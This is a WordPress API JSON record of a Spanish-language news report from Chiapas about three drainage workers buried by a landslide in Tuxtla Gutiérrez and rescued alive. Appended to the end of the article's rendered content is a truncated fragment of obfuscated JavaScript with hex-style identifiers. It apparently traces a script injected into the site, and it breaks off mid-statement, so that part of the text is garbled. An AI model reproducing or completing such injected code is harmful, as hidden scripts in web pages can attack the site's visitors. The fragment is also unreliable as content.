{"id":597,"date":"2022-03-15T20:50:13","date_gmt":"2022-03-15T20:50:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=597"},"modified":"2022-03-15T20:50:15","modified_gmt":"2022-03-15T20:50:15","slug":"obreros-quedan-sepultados-por-alud-de-tierra-son-rescatados-con-vida","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=597","title":{"rendered":"Obreros quedan sepultados por alud de tierra, son rescatados con vida"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"598\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377275897-1024x576.jpg\" alt=\"\" class=\"wp-image-598\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377275897-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377275897-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377275897-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377275897.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"768\" height=\"1024\" data-id=\"599\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377262213-768x1024.jpg\" alt=\"\" class=\"wp-image-599\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377262213-768x1024.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377262213-225x300.jpg 225w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377262213.jpg 960w\" sizes=\"auto, (max-width: 768px) 100vw, 768px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"600\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377257388-1024x576.jpg\" alt=\"\" class=\"wp-image-600\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377257388-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377257388-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377257388-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/FB_IMG_1647377257388.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 15 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Tres obreros que realizaban trabajos de introducci\u00f3n de drenaje en el Bulevar Belisario Dom\u00ednguez y Crucero 28 de agosto en Tuxtla quedaron sepultados al caer un alud de tierra sobre ellos este martes por la ma\u00f1ana.<\/p>\n\n\n\n<p>De acuerdo con el testimonio del encargado de la obra Pablo Gir\u00f3n realizaban la excavaci\u00f3n a una profundidad de cuatro metros por uno de di\u00e1metro cuando de manera repentina la tierra les cay\u00f3 encima.<\/p>\n\n\n\n<p>Vicente de 40 a\u00f1os de edad, Javier de 45 y Octavio de 40 quedaron sepultados, sus compa\u00f1eros inmediatamente comenzaron a cavar para liberarlos.<\/p>\n\n\n\n<p>Con esta acci\u00f3n lograron sacar a los dos primeros, y el tercero fue rescatado por rescatistas de Protecci\u00f3n Civil Municipal y auxiliado por param\u00e9dicos de la CRM.<\/p>\n\n\n\n<p>Los obreros del Smapa resultaron con heridas en varias partes del cuerpo y fueron trasladadas a un nosocomio particular para su atenci\u00f3n m\u00e9dica especializada.<\/p>\n\n\n\n<p>Su estado de salud es fuera de peligro.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 15 de marzo del 2022. Tuxtla Guti\u00e9rrez. &#8211; Tres obreros que realizaban trabajos de introducci\u00f3n de drenaje en el Bulevar Belisario Dom\u00ednguez y Crucero 28 de agosto en Tuxtla quedaron sepultados al caer un alud de tierra sobre ellos este martes por la ma\u00f1ana. De acuerdo con el testimonio del encargado &hellip;<\/p>\n","protected":false},"author":2,"featured_media":599,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-597","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/597","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=597"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/597\/revisions"}],"predecessor-version":[{"id":601,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/597\/revisions\/601"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/599"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=597"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=597"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=597"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}